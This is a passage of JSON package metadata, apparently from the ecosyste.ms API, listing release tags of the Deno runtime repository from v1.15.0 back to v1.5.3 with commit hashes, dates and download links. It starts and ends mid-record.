5.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo